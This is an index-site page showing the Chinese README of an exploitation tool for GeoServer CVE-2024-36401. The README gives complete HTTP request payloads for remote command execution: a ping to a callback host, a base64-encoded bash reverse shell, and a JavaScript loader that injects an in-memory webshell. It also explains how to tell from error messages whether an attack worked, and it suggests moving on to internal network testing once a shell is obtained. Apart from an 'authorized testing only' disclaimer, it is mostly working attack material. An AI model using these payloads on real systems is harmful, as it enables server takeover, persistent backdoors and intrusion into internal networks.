MCPcopy Index your code
hub / github.com/ahisec/geoserver-

github.com/ahisec/geoserver- @main

Chat with this repo
repository ↗ · DeepWiki ↗ · + Follow
23 symbols 49 edges 3 files 0 documented · 0%
What it actually does AI analysis from the code graph — generated when you open this
loading…
README

geoserver CVE-2024-36401 漏洞利用工具

geoserver CVE-2024-36401 环境:JDK8 声明:仅用于授权测试,用户滥用造成的一切后果和作者无关 请遵守法律法规!

1,默认payload:

POST /geoserver/wfs HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: / Connection: close Host: xxxx Accept-Language: en-US;q=0.9,en;q=0.8 Cache-Control: max-age=0 Content-Type: application/xml Content-Length: 356

exec(java.lang.Runtime.getRuntime(),'ping wsn9.callback.red')

那么注意这里:

这个地方,如果你需要采取正则的方式去拿到,这个是sf:archsites网站的一个基本标识,你需要先拿到他的

(.*?)信息,然后你可以采取拼接的方式

判断漏洞的时候 exec(java.lang.Runtime.getRuntime(),'ping wsn9.callback.red')

这个地方,其实都不用去查找dns记录

简单的逻辑就是判断是否存在异常的类

如java.lang.ClassCastException

当然,这只是判断逻辑

这个回显本来就是400,这个地方容易踩坑,你需要判断错误页面后,进行数据查找

首先你需要请求一个

这个信息代表了你可以拿到他的(.*?)

然后直接赋值给文本,然后再调一个函数方法,把文本的截取的信息,拼接到参数的这里

这条就会对判断的逻辑相对精准,检测类就这么写就可以了

如果你只是一直使用 ,那么误判的几率很高,会提示找不到这个sf:archsites

反弹类

我们看看反弹的payload:

POST /geoserver/wfs HTTP/1.1 Host: xxxx User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,/;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Connection: close Cookie: JSESSIONID=5D030E92A0AFCC3B5006597E6524FD8D Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: none Sec-Fetch-User: ?1 Priority: u=0, i Content-Type: application/xml Content-Length: 438

exec(java.lang.Runtime.getRuntime(),'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}')

我们注意这里:

同样,先要正则取值然后拼接给他

然后直接请求

YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvOTk5OSAwPiYx这里是加密过的base64

编写的时候,就把用户输入的bash -i >& /dev/tcp/127.0.0.1/9999 0>&1,转换成base64就可以了

然后发请求,同样,去找关键的异常类,判断逻辑即可

内存马注入类 这个地方 POST /geoserver/wfs HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: / Connection: close Host: xxx Accept-Language: en-US;q=0.9,en;q=0.8 Cache-Control: max-age=0 Content-Type: application/xml Content-Length: 20383

eval(getEngineByName(javax.script.ScriptEngineManager.new(),'js'),' var str=""; var bt; try { bt = java.lang.Class.forName("sun.misc.BASE64Decoder").newInstance().decodeBuffer(str); } catch (e) { bt = java.util.Base64.getDecoder().decode(str); } var theUnsafe = java.lang.Class.forName("sun.misc.Unsafe").getDeclaredField("theUnsafe"); theUnsafe.setAccessible(true); unsafe = theUnsafe.get(null); unsafe.defineAnonymousClass(java.lang.Class.forName("java.lang.Class"), bt, null).newInstance(); ')

这个地方还是有 ,老规矩,先取值

在star这里,放入你生成的base64的内存马加密代码

然后判断逻辑即可

容易踩坑的点 1、 重复利用,误判几率98%,报错如下:

https://geoserver.epic.blue/geoserver/schemas/ows/1.1.0/owsAll.xsd"> Could not locate {http://www.openplans.org/spearfish}archsites in catalog.<

存在漏洞的点: java.lang.ClassCastException: class java.lang.ProcessImpl cannot be cast to class org.opengis.feature.type.AttributeDescriptor (java.lang.ProcessImpl is in module java.base of loader &apos;bootstrap&apos;; org.opengis.feature.type.AttributeDescriptor is in unnamed module of loader org.apache.catalina.loader.ParallelWebappClassLoader @4b9df8a) class java.lang.ProcessImpl cannot be cast to class org.opengis.feature.type.AttributeDescriptor (java.lang.ProcessImpl is in module java.base of loader &apos;bootstrap&apos;; org.opengis.feature.type.AttributeDescriptor is in unnamed module of loader org.apache.catalina.loader.ParallelWebappClassLoader @4b9df8a)

简单来讲存在漏洞就是java.lang.ClassCastException

误判就是Could not locate {http://www.openplans.org/spearfish}archsites in catalog

2、判断方式: 抓取调用的wfs:ReturnFeatureType>,赋给文本-文本调用函数方法,请求,拼接在请求,判断回显的异常

文本调用函数这里,需要提前给值,这样防止出现空指针异常,请求前拼接,判断回显的异常,是异常内进行判断

最终我们实现了这个漏洞利用工具的编写

image

我们来测试一下漏洞

工具执行效果

image

image

提示:无回显和漏洞输出不存在是一样的,存在漏洞的会提示+号

发现漏洞,反弹到shell,做上线测试,如果可以上线,做一波内网测试

优化可能会加入自定义内存马,批量检测等功能

image

发现检测到了漏洞,拿到了端点,反弹shell也成功了

接下来我们来试试注入内存马

image

显示是成功注入内存马,我们来连接看看是否成功

image

是可以连接的

提示:测试内存马,This GeoServer instance is running version 2.15.2. For more information please contact the

该版本内存马打入成功

高版本的可能会失败

其他的自行测试

image

增加了自定义内存马功能

image

更新日志

加入了ls测试,ping测试

修复内存马注入的问题

加入tomcat和jetty的识别

哥斯拉内存马默认使用jetty环境进行注入

自定义内存马可自行选择tomcat环境进行测试

批量版本暂未发布

Core symbols most depended-on inside this repo

fantanshell
called by 4
geoservers/src/fdg.java
generateRandomString
called by 2
geoservers/src/fdg.java
generateRandomString1
called by 2
geoservers/src/fdg.java
geoserverfdfg
called by 2
geoservers/src/fdg.java
zhuaqu
called by 2
geoservers/src/fdg.java
fsdsaddff
called by 2
geoservers/src/fdg.java
jdfdsfdsf
called by 1
geoservers/src/fdg.java
getAcceptedIssuers
called by 0
geoservers/src/TrustAllTrustManager.java

Shape

Method 20
Class 3

Languages

Java100%

Modules by API surface

geoservers/src/fdg.java16 symbols
geoservers/src/TrustAllTrustManager.java4 symbols
geoservers/src/Main.java3 symbols

For agents

$ claude mcp add geoserver- \
  -- python -m otcore.mcp_server <graph>

⬇ download graph artifact